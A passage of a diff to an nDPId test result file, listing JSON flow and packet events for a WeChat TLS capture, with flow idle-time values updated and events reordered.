-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1492167777204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777204,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XvpAAEAGujnAqAFny82Tq+K3Abv08QbJAAAAAKACchB71AAAAgQFtAQCCAoAMlgzAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777220,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rYX2Lh9mWvEIqASN8j8PgAAAgQFoAQCCApF00IlADJX9AEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777220,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0k9ZAAEAGhWXAqAFny82Tq+K2AbuZa8QiF9i4foAQAOVhlwAAAQEICgAyWDdF00Il"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1492167777476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777476,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74reza+A99PEGyqASN8j\/yAAAAgQFoAQCCApFrtz+ADJYMwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1492167777476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777476,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XvtAAEAGukDAqAFny82Tq+K3Abv08QbKs2vgPoAQAOVlIAAAAQEICgAyWHdFrtz+"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765433,"flow_last_seen":1492167765433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765433,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1492167765433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765433,"pkt":"8IQvSpdgeJKcD6iOCABFAAA88RZAAEAGKB3AqAFny82Tq+K0AbvYTb2iAAAAAKACchDtIAAAAgQFtAQCCAoAMky0AAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765657,"flow_last_seen":1492167765657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765657,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1492167765657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765657,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZwNAAEAGsjDAqAFny82Tq+K1Abs3CyvvAAAAAKACchAf3gAAAgQFtAQCCAoAMkzsAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1492167765701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765701,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rSlk19z2E29o6ASN8g4AQAAAgQFoAQCCApF8qRxADJMtAEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1492167765701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765701,"pkt":"8IQvSpdgeJKcD6iOCABFAAA08RdAAEAGKCTAqAFny82Tq+K0AbvYTb2jpZNfdIAQAOWdWQAAAQEICgAyTPdF8qRx"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1492167765933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765933,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rU+QocNNwsr8KASN8h9cwAAAgQFoAQCCApFrtG3ADJM7AEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1492167765933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765933,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZwRAAEAGsjfAqAFny82Tq+K1Abs3CyvwPkKHDoAQAOXiyQAAAQEICgAyTTFFrtG3"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167776953,"flow_last_seen":1492167776953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167776953,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1492167776953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167776953,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8k9VAAEAGhV7AqAFny82Tq+K2AbuZa8QhAAAAAKACchAaQgAAAgQFtAQCCAoAMlf0AAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167777204,"flow_last_seen":1492167777204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167777204,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1492167777204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777204,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XvpAAEAGujnAqAFny82Tq+K3Abv08QbJAAAAAKACchB71AAAAgQFtAQCCAoAMlgzAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1492167777220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777220,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rYX2Lh9mWvEIqASN8j8PgAAAgQFoAQCCApF00IlADJX9AEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1492167777220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777220,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0k9ZAAEAGhWXAqAFny82Tq+K2AbuZa8QiF9i4foAQAOVhlwAAAQEICgAyWDdF00Il"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1492167777476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777476,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74reza+A99PEGyqASN8j\/yAAAAgQFoAQCCApFrtz+ADJYMwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1492167777476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777476,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XvtAAEAGukDAqAFny82Tq+K3Abv08QbKs2vgPoAQAOVlIAAAAQEICgAyWHdFrtz+"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 